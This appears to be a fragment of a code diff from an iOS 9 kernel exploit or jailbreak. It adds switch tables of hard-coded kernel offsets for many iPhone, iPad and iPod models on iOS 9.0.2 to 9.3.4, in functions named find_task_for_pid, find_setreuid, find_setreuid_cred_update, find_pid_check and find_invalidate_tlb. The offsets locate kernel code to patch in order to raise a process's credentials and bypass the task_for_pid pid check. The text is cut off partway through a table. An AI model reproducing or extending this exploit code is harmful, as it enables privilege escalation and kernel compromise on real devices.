+        case iPad21_iOS932: return 0xbc260;
+        case iPad21_iOS933: return 0xbc1d4;
+        case iPad21_iOS934: return 0xbc1d4;
+        case iPad22_iOS910: return 0xbcb7c;
+        case iPad22_iOS920: return 0xbb710;
+        case iPad22_iOS921: return 0xbb760;
+        case iPad22_iOS930: return 0xbc250;
+        case iPad22_iOS931: return 0xbc250;
+        case iPad22_iOS932: return 0xbc260;
+        case iPad22_iOS933: return 0xbc1d4;
+        case iPad22_iOS934: return 0xbc1d4;
+        case iPad23_iOS910: return 0xbcb7c;
+        case iPad23_iOS920: return 0xbb710;
+        case iPad23_iOS921: return 0xbb760;
+        case iPad23_iOS930: return 0xbc250;
+        case iPad23_iOS931: return 0xbc250;
+        case iPad23_iOS932: return 0xbc260;
+        case iPad23_iOS933: return 0xbc1d8;
+        case iPad23_iOS934: return 0xbc1d4;
+        case iPad24_iOS910: return 0xbcb7c;
+        case iPad24_iOS920: return 0xbb710;
+        case iPad24_iOS921: return 0xbb760;
+        case iPad24_iOS930: return 0xbc250;
+        case iPad24_iOS931: return 0xbc250;
+        case iPad24_iOS932: return 0xbc260;
+        case iPad24_iOS933: return 0xbc1d8;
+        case iPad24_iOS934: return 0xbc1d4;
+        case iPad25_iOS902: return 0xbc9b8;
+        case iPad31_iOS910: return 0xbcb7c;
+        case iPad31_iOS920: return 0xbb710;
+        case iPad31_iOS921: return 0xbb760;
+        case iPad31_iOS930: return 0xbc250;
+        case iPad31_iOS931: return 0xbc250;
+        case iPad31_iOS932: return 0xbc260;
+        case iPad31_iOS933: return 0xbc1d4;
+        case iPad31_iOS934: return 0xbc1d4;
+        case iPad32_iOS910: return 0xbcb7c;
+        case iPad32_iOS920: return 0xbb710;
+        case iPad32_iOS921: return 0xbb760;
+        case iPad32_iOS930: return 0xbc250;
+        case iPad32_iOS931: return 0xbc250;
+        case iPad32_iOS932: return 0xbc260;
+        case iPad32_iOS933: return 0xbc1d4;
+        case iPad32_iOS934: return 0xbc1d4;
+        case iPad33_iOS902: return 0xbc9b8;
+        case iPad33_iOS910: return 0xbcb7c;
+        case iPad33_iOS920: return 0xbb710;
+        case iPad33_iOS921: return 0xbb760;
+        case iPad33_iOS930: return 0xbc250;
+        case iPad33_iOS931: return 0xbc250;
+        case iPad33_iOS932: return 0xbc260;
+        case iPad33_iOS933: return 0xbc1d4;
+        case iPad33_iOS934: return 0xbc1d4;
+        case iPad34_iOS910: return 0xbf770;
+        case iPad34_iOS920: return 0xbe598;
+        case iPad34_iOS921: return 0xbe5d8;
+        case iPad34_iOS930: return 0xbf284;
+        case iPad34_iOS931: return 0xbf284;
+        case iPad34_iOS932: return 0xbf274;
+        case iPad34_iOS933: return 0xbf404;
+        case iPad34_iOS934: return 0xbf404;
+        case iPad35_iOS910: return 0xbf770;
+        case iPad35_iOS920: return 0xbe598;
+        case iPad35_iOS921: return 0xbe5d8;
+        case iPad35_iOS930: return 0xbf284;
+        case iPad35_iOS931: return 0xbf284;
+        case iPad35_iOS932: return 0xbf274;
+        case iPad35_iOS933: return 0xbf404;
+        case iPad35_iOS934: return 0xbf404;
+        case iPad36_iOS910: return 0xbf770;
+        case iPad36_iOS920: return 0xbe598;
+        case iPad36_iOS921: return 0xbe5d8;
+        case iPad36_iOS930: return 0xbf284;
+        case iPad36_iOS931: return 0xbf284;
+        case iPad36_iOS932: return 0xbf274;
+        case iPad36_iOS933: return 0xbf404;
+        case iPad36_iOS934: return 0xbf404;
+        case iPod51_iOS910: return 0xbcb7c;
+        case iPod51_iOS920: return 0xbb710;
+        case iPod51_iOS921: return 0xbb760;
+        case iPod51_iOS930: return 0xbc250;
+        case iPod51_iOS931: return 0xbc250;
+        case iPod51_iOS932: return 0xbc260;
+        case iPod51_iOS933: return 0xbc1d4;
+        case iPod51_iOS934: return 0xbc1d4;
+        default: return 0;
+    }
+}
+
+static inline unsigned int find_invalidate_tlb(void) {
+    switch (target_environment) {
+        case iPhone41_iOS902: return 0xc74e0;
+        case iPhone41_iOS910: return 0xc74e0;
+        case iPhone41_iOS920: return 0xc64e0;
+        case iPhone41_iOS921: return 0xc64e0;
+        case iPhone41_iOS930: return 0xc7440;
+        case iPhone41_iOS931: return 0xc7440;
+        case iPhone41_iOS932: return 0xc7440;
+        case iPhone41_iOS933: return 0xc7440;
+        case iPhone41_iOS934: return 0xc7440;
+        case iPhone51_iOS910: return 0xcb600;
+        case iPhone51_iOS920: return 0xca600;
+        case iPhone51_iOS921: return 0xca600;
+        case iPhone51_iOS930: return 0xcb560;
+        case iPhone51_iOS931: return 0xcb560;
+        case iPhone51_iOS932: return 0xcb560;
+        case iPhone51_iOS933: return 0xcb560;
+        case iPhone51_iOS934: return 0xcb560;
+        case iPhone52_iOS902: return 0xcb600;
+        case iPhone52_iOS910: return 0xcb600;
+        case iPhone52_iOS920: return 0xca600;
+        case iPhone52_iOS921: return 0xca600;
+        case iPhone52_iOS930: return 0xcb560;
+        case iPhone52_iOS931: return 0xcb560;
+        case iPhone52_iOS932: return 0xcb560;
+        case iPhone52_iOS933: return 0xcb560;
+        case iPhone52_iOS934: return 0xcb560;
+        case iPhone53_iOS910: return 0xcb600;
+        case iPhone53_iOS920: return 0xca600;
+        case iPhone53_iOS921: return 0xca600;
+        case iPhone53_iOS930: return 0xcb560;
+        case iPhone53_iOS931: return 0xcb560;
+        case iPhone53_iOS932: return 0xcb560;
+        case iPhone53_iOS933: return 0xcb560;
+        case iPhone53_iOS934: return 0xcb560;
+        case iPhone54_iOS910: return 0xcb600;
+        case iPhone54_iOS920: return 0xca600;
+        case iPhone54_iOS921: return 0xca600;
+        case iPhone54_iOS930: return 0xcb560;
+        case iPhone54_iOS931: return 0xcb560;
+        case iPhone54_iOS932: return 0xcb560;
+        case iPhone54_iOS933: return 0xcb560;
+        case iPhone54_iOS934: return 0xcb560;
+        case iPad21_iOS910: return 0xc74e0;
+        case iPad21_iOS920: return 0xc64e0;
+        case iPad21_iOS921: return 0xc64e0;
+        case iPad21_iOS930: return 0xc7440;
+        case iPad21_iOS931: return 0xc7440;
+        case iPad21_iOS932: return 0xc7440;
+        case iPad21_iOS933: return 0xc7440;
+        case iPad21_iOS934: return 0xc7440;
+        case iPad22_iOS910: return 0xc74e0;
+        case iPad22_iOS920: return 0xc64e0;
+        case iPad22_iOS921: return 0xc64e0;
+        case iPad22_iOS930: return 0xc7440;
+        case iPad22_iOS931: return 0xc7440;
+        case iPad22_iOS932: return 0xc7440;
+        case iPad22_iOS933: return 0xc7440;
+        case iPad22_iOS934: return 0xc7440;
+        case iPad23_iOS910: return 0xc74e0;
+        case iPad23_iOS920: return 0xc64e0;
+        case iPad23_iOS921: return 0xc64e0;
+        case iPad23_iOS930: return 0xc7440;
+        case iPad23_iOS931: return 0xc7440;
+        case iPad23_iOS932: return 0xc7440;
+        case iPad23_iOS933: return 0xc7450;
+        case iPad23_iOS934: return 0xc7440;
+        case iPad24_iOS910: return 0xc74e0;
+        case iPad24_iOS920: return 0xc64e0;
+        case iPad24_iOS921: return 0xc64e0;
+        case iPad24_iOS930: return 0xc7440;
+        case iPad24_iOS931: return 0xc7440;
+        case iPad24_iOS932: return 0xc7440;
+        case iPad24_iOS933: return 0xc7450;
+        case iPad24_iOS934: return 0xc7440;
+        case iPad25_iOS902: return 0xc74e0;
+        case iPad31_iOS910: return 0xc74e0;
+        case iPad31_iOS920: return 0xc64e0;
+        case iPad31_iOS921: return 0xc64e0;
+        case iPad31_iOS930: return 0xc7440;
+        case iPad31_iOS931: return 0xc7440;
+        case iPad31_iOS932: return 0xc7440;
+        case iPad31_iOS933: return 0xc7440;
+        case iPad31_iOS934: return 0xc7440;
+        case iPad32_iOS910: return 0xc74e0;
+        case iPad32_iOS920: return 0xc64e0;
+        case iPad32_iOS921: return 0xc64e0;
+        case iPad32_iOS930: return 0xc7440;
+        case iPad32_iOS931: return 0xc7440;
+        case iPad32_iOS932: return 0xc7440;
+        case iPad32_iOS933: return 0xc7440;
+        case iPad32_iOS934: return 0xc7440;
+        case iPad33_iOS902: return 0xc74e0;
+        case iPad33_iOS910: return 0xc74e0;
+        case iPad33_iOS920: return 0xc64e0;
+        case iPad33_iOS921: return 0xc64e0;
+        case iPad33_iOS930: return 0xc7440;
+        case iPad33_iOS931: return 0xc7440;
+        case iPad33_iOS932: return 0xc7440;
+        case iPad33_iOS933: return 0xc7440;
+        case iPad33_iOS934: return 0xc7440;
+        case iPad34_iOS910: return 0xcb600;
+        case iPad34_iOS920: return 0xca600;
+        case iPad34_iOS921: return 0xca600;
+        case iPad34_iOS930: return 0xcb560;
+        case iPad34_iOS931: return 0xcb560;
+        case iPad34_iOS932: return 0xcb560;
+        case iPad34_iOS933: return 0xcb560;
+        case iPad34_iOS934: return 0xcb560;
+        case iPad35_iOS910: return 0xcb600;
+        case iPad35_iOS920: return 0xca600;
+        case iPad35_iOS921: return 0xca600;
+        case iPad35_iOS930: return 0xcb560;
+        case iPad35_iOS931: return 0xcb560;
+        case iPad35_iOS932: return 0xcb560;
+        case iPad35_iOS933: return 0xcb560;
+        case iPad35_iOS934: return 0xcb560;
+        case iPad36_iOS910: return 0xcb600;
+        case iPad36_iOS920: return 0xca600;
+        case iPad36_iOS921: return 0xca600;
+        case iPad36_iOS930: return 0xcb560;
+        case iPad36_iOS931: return 0xcb560;
+        case iPad36_iOS932: return 0xcb560;
+        case iPad36_iOS933: return 0xcb560;
+        case iPad36_iOS934: return 0xcb560;
+        case iPod51_iOS910: return 0xc74e0;
+        case iPod51_iOS920: return 0xc64e0;
+        case iPod51_iOS921: return 0xc64e0;
+        case iPod51_iOS930: return 0xc7440;
+        case iPod51_iOS931: return 0xc7440;
+        case iPod51_iOS932: return 0xc7440;
+        case iPod51_iOS933: return 0xc7440;
+        case iPod51_iOS934: return 0xc7440;
+        default: return 0;
+    }
+}
+
+static inline unsigned int find_task_for_pid(void) {
+    switch (target_environment) {
+        case iPhone41_iOS902: return 0x2fca70;
+        case iPhone41_iOS910: return 0x2fe034;
+        case iPhone41_iOS920: return 0x2f55b4;
+        case iPhone41_iOS921: return 0x2f56c4;
+        case iPhone41_iOS930: return 0x2fcc8c;
+        case iPhone41_iOS931: return 0x2fcc8c;
+        case iPhone41_iOS932: return 0x2fcd80;
+        case iPhone41_iOS933: return 0x2fcec0;
+        case iPhone41_iOS934: return 0x2fcec0;
+        case iPhone51_iOS910: return 0x3040a4;
+        case iPhone51_iOS920: return 0x2fbb8c;
+        case iPhone51_iOS921: return 0x2fbc9c;
+        case iPhone51_iOS930: return 0x302e3c;
+        case iPhone51_iOS931: return 0x302e3c;
+        case iPhone51_iOS932: return 0x302df0;
+        case iPhone51_iOS933: return 0x302fd4;
+        case iPhone51_iOS934: return 0x302fd4;
+        case iPhone52_iOS902: return 0x302bdc;
+        case iPhone52_iOS910: return 0x3040a4;
+        case iPhone52_iOS920: return 0x2fbb8c;
+        case iPhone52_iOS921: return 0x2fbc9c;
+        case iPhone52_iOS930: return 0x302e3c;
+        case iPhone52_iOS931: return 0x302e3c;
+        case iPhone52_iOS932: return 0x302df0;
+        case iPhone52_iOS933: return 0x302fd4;
+        case iPhone52_iOS934: return 0x302fd4;
+        case iPhone53_iOS910: return 0x3040a4;
+        case iPhone53_iOS920: return 0x2fbb8c;
+        case iPhone53_iOS921: return 0x2fbc9c;
+        case iPhone53_iOS930: return 0x302e3c;
+        case iPhone53_iOS931: return 0x302e3c;
+        case iPhone53_iOS932: return 0x302df0;
+        case iPhone53_iOS933: return 0x302fd4;
+        case iPhone53_iOS934: return 0x302fd4;
+        case iPhone54_iOS910: return 0x3040a4;
+        case iPhone54_iOS920: return 0x2fbb8c;
+        case iPhone54_iOS921: return 0x2fbc9c;
+        case iPhone54_iOS930: return 0x302e3c;
+        case iPhone54_iOS931: return 0x302e3c;
+        case iPhone54_iOS932: return 0x302df0;
+        case iPhone54_iOS933: return 0x302fd4;
+        case iPhone54_iOS934: return 0x302fd4;
+        case iPad21_iOS910: return 0x2fe034;
+        case iPad21_iOS920: return 0x2f55b4;
+        case iPad21_iOS921: return 0x2f56c4;
+        case iPad21_iOS930: return 0x2fcc8c;
+        case iPad21_iOS931: return 0x2fcc8c;
+        case iPad21_iOS932: return 0x2fcd80;
+        case iPad21_iOS933: return 0x2fcec0;
+        case iPad21_iOS934: return 0x2fcec0;
+        case iPad22_iOS910: return 0x2fe034;
+        case iPad22_iOS920: return 0x2f55b4;
+        case iPad22_iOS921: return 0x2f56c4;
+        case iPad22_iOS930: return 0x2fcc8c;
+        case iPad22_iOS931: return 0x2fcc8c;
+        case iPad22_iOS932: return 0x2fcd80;
+        case iPad22_iOS933: return 0x2fcec0;
+        case iPad22_iOS934: return 0x2fcec0;
+        case iPad23_iOS910: return 0x2fe034;
+        case iPad23_iOS920: return 0x2f55b4;
+        case iPad23_iOS921: return 0x2f56c4;
+        case iPad23_iOS930: return 0x2fcc8c;
+        case iPad23_iOS931: return 0x2fcc8c;
+        case iPad23_iOS932: return 0x2fcd80;
+        case iPad23_iOS933: return 0x2fcec0;
+        case iPad23_iOS934: return 0x2fcec0;
+        case iPad24_iOS910: return 0x2fe034;
+        case iPad24_iOS920: return 0x2f55b4;
+        case iPad24_iOS921: return 0x2f56c4;
+        case iPad24_iOS930: return 0x2fcc8c;
+        case iPad24_iOS931: return 0x2fcc8c;
+        case iPad24_iOS932: return 0x2fcd80;
+        case iPad24_iOS933: return 0x2fcec0;
+        case iPad24_iOS934: return 0x2fcec0;
+        case iPad25_iOS902: return 0x2fca70;
+        case iPad31_iOS910: return 0x2fe034;
+        case iPad31_iOS920: return 0x2f55b4;
+        case iPad31_iOS921: return 0x2f56c4;
+        case iPad31_iOS930: return 0x2fcc8c;
+        case iPad31_iOS931: return 0x2fcc8c;
+        case iPad31_iOS932: return 0x2fcd80;
+        case iPad31_iOS933: return 0x2fcec0;
+        case iPad31_iOS934: return 0x2fcec0;
+        case iPad32_iOS910: return 0x2fe034;
+        case iPad32_iOS920: return 0x2f55b4;
+        case iPad32_iOS921: return 0x2f56c4;
+        case iPad32_iOS930: return 0x2fcc8c;
+        case iPad32_iOS931: return 0x2fcc8c;
+        case iPad32_iOS932: return 0x2fcd80;
+        case iPad32_iOS933: return 0x2fcec0;
+        case iPad32_iOS934: return 0x2fcec0;
+        case iPad33_iOS902: return 0x2fca70;
+        case iPad33_iOS910: return 0x2fe034;
+        case iPad33_iOS920: return 0x2f55b4;
+        case iPad33_iOS921: return 0x2f56c4;
+        case iPad33_iOS930: return 0x2fcc8c;
+        case iPad33_iOS931: return 0x2fcc8c;
+        case iPad33_iOS932: return 0x2fcd80;
+        case iPad33_iOS933: return 0x2fcec0;
+        case iPad33_iOS934: return 0x2fcec0;
+        case iPad34_iOS910: return 0x3040a4;
+        case iPad34_iOS920: return 0x2fbb8c;
+        case iPad34_iOS921: return 0x2fbc9c;
+        case iPad34_iOS930: return 0x302e3c;
+        case iPad34_iOS931: return 0x302e3c;
+        case iPad34_iOS932: return 0x302df0;
+        case iPad34_iOS933: return 0x302fd4;
+        case iPad34_iOS934: return 0x302fd4;
+        case iPad35_iOS910: return 0x3040a4;
+        case iPad35_iOS920: return 0x2fbb8c;
+        case iPad35_iOS921: return 0x2fbc9c;
+        case iPad35_iOS930: return 0x302e3c;
+        case iPad35_iOS931: return 0x302e3c;
+        case iPad35_iOS932: return 0x302df0;
+        case iPad35_iOS933: return 0x302fd4;
+        case iPad35_iOS934: return 0x302fd4;
+        case iPad36_iOS910: return 0x3040a4;
+        case iPad36_iOS920: return 0x2fbb8c;
+        case iPad36_iOS921: return 0x2fbc9c;
+        case iPad36_iOS930: return 0x302e3c;
+        case iPad36_iOS931: return 0x302e3c;
+        case iPad36_iOS932: return 0x302df0;
+        case iPad36_iOS933: return 0x302fd4;
+        case iPad36_iOS934: return 0x302fd4;
+        case iPod51_iOS910: return 0x2fe034;
+        case iPod51_iOS920: return 0x2f55b4;
+        case iPod51_iOS921: return 0x2f56c4;
+        case iPod51_iOS930: return 0x2fcc8c;
+        case iPod51_iOS931: return 0x2fcc8c;
+        case iPod51_iOS932: return 0x2fcd80;
+        case iPod51_iOS933: return 0x2fcec0;
+        case iPod51_iOS934: return 0x2fcec0;
+        default: return 0;
+    }
+}
+
+static inline unsigned int find_setreuid(void) {
+    switch (target_environment) {
+        case iPhone41_iOS902: return 0x2a9754;
+        case iPhone41_iOS910: return 0x2aa31c;
+        case iPhone41_iOS920: return 0x2a3ab4;
+        case iPhone41_iOS921: return 0x2a3bc4;
+        case iPhone41_iOS930: return 0x2a977c;
+        case iPhone41_iOS931: return 0x2a977c;
+        case iPhone41_iOS932: return 0x2a985c;
+        case iPhone41_iOS933: return 0x2a9988;
+        case iPhone41_iOS934: return 0x2a9988;
+        case iPhone51_iOS910: return 0x2b00f0;
+        case iPhone51_iOS920: return 0x2a9e24;
+        case iPhone51_iOS921: return 0x2a9f34;
+        case iPhone51_iOS930: return 0x2af658;
+        case iPhone51_iOS931: return 0x2af658;
+        case iPhone51_iOS932: return 0x2af5f8;
+        case iPhone51_iOS933: return 0x2af7b8;
+        case iPhone51_iOS934: return 0x2af7b8;
+        case iPhone52_iOS902: return 0x2af674;
+        case iPhone52_iOS910: return 0x2b00f0;
+        case iPhone52_iOS920: return 0x2a9e24;
+        case iPhone52_iOS921: return 0x2a9f34;
+        case iPhone52_iOS930: return 0x2af658;
+        case iPhone52_iOS931: return 0x2af658;
+        case iPhone52_iOS932: return 0x2af5f8;
+        case iPhone52_iOS933: return 0x2af7b8;
+        case iPhone52_iOS934: return 0x2af7b8;
+        case iPhone53_iOS910: return 0x2b00f0;
+        case iPhone53_iOS920: return 0x2a9e24;
+        case iPhone53_iOS921: return 0x2a9f34;
+        case iPhone53_iOS930: return 0x2af658;
+        case iPhone53_iOS931: return 0x2af658;
+        case iPhone53_iOS932: return 0x2af5f8;
+        case iPhone53_iOS933: return 0x2af7b8;
+        case iPhone53_iOS934: return 0x2af7b8;
+        case iPhone54_iOS910: return 0x2b00f0;
+        case iPhone54_iOS920: return 0x2a9e24;
+        case iPhone54_iOS921: return 0x2a9f34;
+        case iPhone54_iOS930: return 0x2af658;
+        case iPhone54_iOS931: return 0x2af658;
+        case iPhone54_iOS932: return 0x2af5f8;
+        case iPhone54_iOS933: return 0x2af7b8;
+        case iPhone54_iOS934: return 0x2af7b8;
+        case iPad21_iOS910: return 0x2aa31c;
+        case iPad21_iOS920: return 0x2a3ab4;
+        case iPad21_iOS921: return 0x2a3bc4;
+        case iPad21_iOS930: return 0x2a977c;
+        case iPad21_iOS931: return 0x2a977c;
+        case iPad21_iOS932: return 0x2a985c;
+        case iPad21_iOS933: return 0x2a9988;
+        case iPad21_iOS934: return 0x2a9988;
+        case iPad22_iOS910: return 0x2aa31c;
+        case iPad22_iOS920: return 0x2a3ab4;
+        case iPad22_iOS921: return 0x2a3bc4;
+        case iPad22_iOS930: return 0x2a977c;
+        case iPad22_iOS931: return 0x2a977c;
+        case iPad22_iOS932: return 0x2a985c;
+        case iPad22_iOS933: return 0x2a9988;
+        case iPad22_iOS934: return 0x2a9988;
+        case iPad23_iOS910: return 0x2aa31c;
+        case iPad23_iOS920: return 0x2a3ab4;
+        case iPad23_iOS921: return 0x2a3bc4;
+        case iPad23_iOS930: return 0x2a977c;
+        case iPad23_iOS931: return 0x2a977c;
+        case iPad23_iOS932: return 0x2a985c;
+        case iPad23_iOS933: return 0x2a9988;
+        case iPad23_iOS934: return 0x2a9988;
+        case iPad24_iOS910: return 0x2aa31c;
+        case iPad24_iOS920: return 0x2a3ab4;
+        case iPad24_iOS921: return 0x2a3bc4;
+        case iPad24_iOS930: return 0x2a977c;
+        case iPad24_iOS931: return 0x2a977c;
+        case iPad24_iOS932: return 0x2a985c;
+        case iPad24_iOS933: return 0x2a9988;
+        case iPad24_iOS934: return 0x2a9988;
+        case iPad25_iOS902: return 0x2a9754;
+        case iPad31_iOS910: return 0x2aa31c;
+        case iPad31_iOS920: return 0x2a3ab4;
+        case iPad31_iOS921: return 0x2a3bc4;
+        case iPad31_iOS930: return 0x2a977c;
+        case iPad31_iOS931: return 0x2a977c;
+        case iPad31_iOS932: return 0x2a985c;
+        case iPad31_iOS933: return 0x2a9988;
+        case iPad31_iOS934: return 0x2a9988;
+        case iPad32_iOS910: return 0x2aa31c;
+        case iPad32_iOS920: return 0x2a3ab4;
+        case iPad32_iOS921: return 0x2a3bc4;
+        case iPad32_iOS930: return 0x2a977c;
+        case iPad32_iOS931: return 0x2a977c;
+        case iPad32_iOS932: return 0x2a985c;
+        case iPad32_iOS933: return 0x2a9988;
+        case iPad32_iOS934: return 0x2a9988;
+        case iPad33_iOS902: return 0x2a9754;
+        case iPad33_iOS910: return 0x2aa31c;
+        case iPad33_iOS920: return 0x2a3ab4;
+        case iPad33_iOS921: return 0x2a3bc4;
+        case iPad33_iOS930: return 0x2a977c;
+        case iPad33_iOS931: return 0x2a977c;
+        case iPad33_iOS932: return 0x2a985c;
+        case iPad33_iOS933: return 0x2a9988;
+        case iPad33_iOS934: return 0x2a9988;
+        case iPad34_iOS910: return 0x2b00f0;
+        case iPad34_iOS920: return 0x2a9e24;
+        case iPad34_iOS921: return 0x2a9f34;
+        case iPad34_iOS930: return 0x2af658;
+        case iPad34_iOS931: return 0x2af658;
+        case iPad34_iOS932: return 0x2af5f8;
+        case iPad34_iOS933: return 0x2af7b8;
+        case iPad34_iOS934: return 0x2af7b8;
+        case iPad35_iOS910: return 0x2b00f0;
+        case iPad35_iOS920: return 0x2a9e24;
+        case iPad35_iOS921: return 0x2a9f34;
+        case iPad35_iOS930: return 0x2af658;
+        case iPad35_iOS931: return 0x2af658;
+        case iPad35_iOS932: return 0x2af5f8;
+        case iPad35_iOS933: return 0x2af7b8;
+        case iPad35_iOS934: return 0x2af7b8;
+        case iPad36_iOS910: return 0x2b00f0;
+        case iPad36_iOS920: return 0x2a9e24;
+        case iPad36_iOS921: return 0x2a9f34;
+        case iPad36_iOS930: return 0x2af658;
+        case iPad36_iOS931: return 0x2af658;
+        case iPad36_iOS932: return 0x2af5f8;
+        case iPad36_iOS933: return 0x2af7b8;
+        case iPad36_iOS934: return 0x2af7b8;
+        case iPod51_iOS910: return 0x2aa31c;
+        case iPod51_iOS920: return 0x2a3ab4;
+        case iPod51_iOS921: return 0x2a3bc4;
+        case iPod51_iOS930: return 0x2a977c;
+        case iPod51_iOS931: return 0x2a977c;
+        case iPod51_iOS932: return 0x2a985c;
+        case iPod51_iOS933: return 0x2a9988;
+        case iPod51_iOS934: return 0x2a9988;
+        default: return 0;
+    }
+}
+
+static inline unsigned int find_setreuid_cred_update(void) {
+    switch (target_environment) {
+        case iPhone41_iOS902: return 0xe040;
+        case iPhone41_iOS910: return 0xe031;
+        case iPhone41_iOS920: return 0xe031;
+        case iPhone41_iOS921: return 0xe031;
+        case iPhone41_iOS930: return 0xe031;
+        case iPhone41_iOS931: return 0xe031;
+        case iPhone41_iOS932: return 0xe031;
+        case iPhone41_iOS933: return 0xe031;
+        case iPhone41_iOS934: return 0xe031;
+        case iPhone51_iOS910: return 0xe031;
+        case iPhone51_iOS920: return 0xe031;
+        case iPhone51_iOS921: return 0xe031;
+        case iPhone51_iOS930: return 0xe031;
+        case iPhone51_iOS931: return 0xe031;
+        case iPhone51_iOS932: return 0xe031;
+        case iPhone51_iOS933: return 0xe031;
+        case iPhone51_iOS934: return 0xe031;
+        case iPhone52_iOS902: return 0xe042;
+        case iPhone52_iOS910: return 0xe031;
+        case iPhone52_iOS920: return 0xe031;
+        case iPhone52_iOS921: return 0xe031;
+        case iPhone52_iOS930: return 0xe031;
+        case iPhone52_iOS931: return 0xe031;
+        case iPhone52_iOS932: return 0xe031;
+        case iPhone52_iOS933: return 0xe031;
+        case iPhone52_iOS934: return 0xe031;
+        case iPhone53_iOS910: return 0xe031;
+        case iPhone53_iOS920: return 0xe031;
+        case iPhone53_iOS921: return 0xe031;
+        case iPhone53_iOS930: return 0xe031;
+        case iPhone53_iOS931: return 0xe031;
+        case iPhone53_iOS932: return 0xe031;
+        case iPhone53_iOS933: return 0xe031;
+        case iPhone53_iOS934: return 0xe031;
+        case iPhone54_iOS910: return 0xe031;
+        case iPhone54_iOS920: return 0xe031;
+        case iPhone54_iOS921: return 0xe031;
+        case iPhone54_iOS930: return 0xe031;
+        case iPhone54_iOS931: return 0xe031;
+        case iPhone54_iOS932: return 0xe031;
+        case iPhone54_iOS933: return 0xe031;
+        case iPhone54_iOS934: return 0xe031;
+        case iPad21_iOS910: return 0xe031;
+        case iPad21_iOS920: return 0xe031;
+        case iPad21_iOS921: return 0xe031;
+        case iPad21_iOS930: return 0xe031;
+        case iPad21_iOS931: return 0xe031;
+        case iPad21_iOS932: return 0xe031;
+        case iPad21_iOS933: return 0xe031;
+        case iPad21_iOS934: return 0xe031;
+        case iPad22_iOS910: return 0xe031;
+        case iPad22_iOS920: return 0xe031;
+        case iPad22_iOS921: return 0xe031;
+        case iPad22_iOS930: return 0xe031;
+        case iPad22_iOS931: return 0xe031;
+        case iPad22_iOS932: return 0xe031;
+        case iPad22_iOS933: return 0xe031;
+        case iPad22_iOS934: return 0xe031;
+        case iPad23_iOS910: return 0xe031;
+        case iPad23_iOS920: return 0xe031;
+        case iPad23_iOS921: return 0xe031;
+        case iPad23_iOS930: return 0xe031;
+        case iPad23_iOS931: return 0xe031;
+        case iPad23_iOS932: return 0xe031;
+        case iPad23_iOS933: return 0xe031;
+        case iPad23_iOS934: return 0xe031;
+        case iPad24_iOS910: return 0xe031;
+        case iPad24_iOS920: return 0xe031;
+        case iPad24_iOS921: return 0xe031;
+        case iPad24_iOS930: return 0xe031;
+        case iPad24_iOS931: return 0xe031;
+        case iPad24_iOS932: return 0xe031;
+        case iPad24_iOS933: return 0xe031;
+        case iPad24_iOS934: return 0xe031;
+        case iPad25_iOS902: return 0xe031;
+        case iPad31_iOS910: return 0xe031;
+        case iPad31_iOS920: return 0xe031;
+        case iPad31_iOS921: return 0xe031;
+        case iPad31_iOS930: return 0xe031;
+        case iPad31_iOS931: return 0xe031;
+        case iPad31_iOS932: return 0xe031;
+        case iPad31_iOS933: return 0xe031;
+        case iPad31_iOS934: return 0xe031;
+        case iPad32_iOS910: return 0xe031;
+        case iPad32_iOS920: return 0xe031;
+        case iPad32_iOS921: return 0xe031;
+        case iPad32_iOS930: return 0xe031;
+        case iPad32_iOS931: return 0xe031;
+        case iPad32_iOS932: return 0xe031;
+        case iPad32_iOS933: return 0xe031;
+        case iPad32_iOS934: return 0xe031;
+        case iPad33_iOS902: return 0xe031;
+        case iPad33_iOS910: return 0xe031;
+        case iPad33_iOS920: return 0xe031;
+        case iPad33_iOS921: return 0xe031;
+        case iPad33_iOS930: return 0xe031;
+        case iPad33_iOS931: return 0xe031;
+        case iPad33_iOS932: return 0xe031;
+        case iPad33_iOS933: return 0xe031;
+        case iPad33_iOS934: return 0xe031;
+        case iPad34_iOS910: return 0xe031;
+        case iPad34_iOS920: return 0xe031;
+        case iPad34_iOS921: return 0xe031;
+        case iPad34_iOS930: return 0xe031;
+        case iPad34_iOS931: return 0xe031;
+        case iPad34_iOS932: return 0xe031;
+        case iPad34_iOS933: return 0xe031;
+        case iPad34_iOS934: return 0xe031;
+        case iPad35_iOS910: return 0xe031;
+        case iPad35_iOS920: return 0xe031;
+        case iPad35_iOS921: return 0xe031;
+        case iPad35_iOS930: return 0xe031;
+        case iPad35_iOS931: return 0xe031;
+        case iPad35_iOS932: return 0xe031;
+        case iPad35_iOS933: return 0xe031;
+        case iPad35_iOS934: return 0xe031;
+        case iPad36_iOS910: return 0xe031;
+        case iPad36_iOS920: return 0xe031;
+        case iPad36_iOS921: return 0xe031;
+        case iPad36_iOS930: return 0xe031;
+        case iPad36_iOS931: return 0xe031;
+        case iPad36_iOS932: return 0xe031;
+        case iPad36_iOS933: return 0xe031;
+        case iPad36_iOS934: return 0xe031;
+        case iPod51_iOS910: return 0xe03e;
+        case iPod51_iOS920: return 0xe031;
+        case iPod51_iOS921: return 0xe031;
+        case iPod51_iOS930: return 0xe031;
+        case iPod51_iOS931: return 0xe031;
+        case iPod51_iOS932: return 0xe031;
+        case iPod51_iOS933: return 0xe031;
+        case iPod51_iOS934: return 0xe031;
+        default: return 0;
+    }
+}
+
+static inline unsigned int find_pid_check(void) {
+    switch (target_environment) {
+        case iPhone41_iOS902: return 0x16;
+        case iPhone41_iOS910: return 0x14;
+        case iPhone41_iOS920: return 0x14;
+        case iPhone41_iOS921: return 0x14;
+        case iPhone41_iOS930: return 0x14;
+        case iPhone41_iOS931: return 0x14;
+        case iPhone41_iOS932: return 0x14;
+        case iPhone41_iOS933: return 0x14;
+        case iPhone41_iOS934: return 0x14;
+        case iPhone51_iOS910: return 0x16;
+        case iPhone51_iOS920: return 0x16;
+        case iPhone51_iOS921: return 0x16;
+        case iPhone51_iOS930: return 0x16;
+        case iPhone51_iOS931: return 0x16;
+        case iPhone51_iOS932: return 0x16;
+        case iPhone51_iOS933: return 0x16;
+        case iPhone51_iOS934: return 0x16;
+        case iPhone52_iOS902: return 0x18;
+        case iPhone52_iOS910: return 0x16;
+        case iPhone52_iOS920: return 0x16;
+        case iPhone52_iOS921: return 0x16;
+        case iPhone52_iOS930: return 0x16;
+        case iPhone52_iOS931: return 0x16;
+        case iPhone52_iOS932: return 0x16;
+        case iPhone52_iOS933: return 0x16;
+        case iPhone52_iOS934: return 0x16;
+        case iPhone53_iOS910: return 0x16;
+        case iPhone53_iOS920: return 0x16;
+        case iPhone53_iOS921: return 0x16;
+        case iPhone53_iOS930: return 0x16;
+        case iPhone53_iOS931: return 0x16;
+        case iPhone53_iOS932: return 0x16;
+        case iPhone53_iOS933: return 0x16;
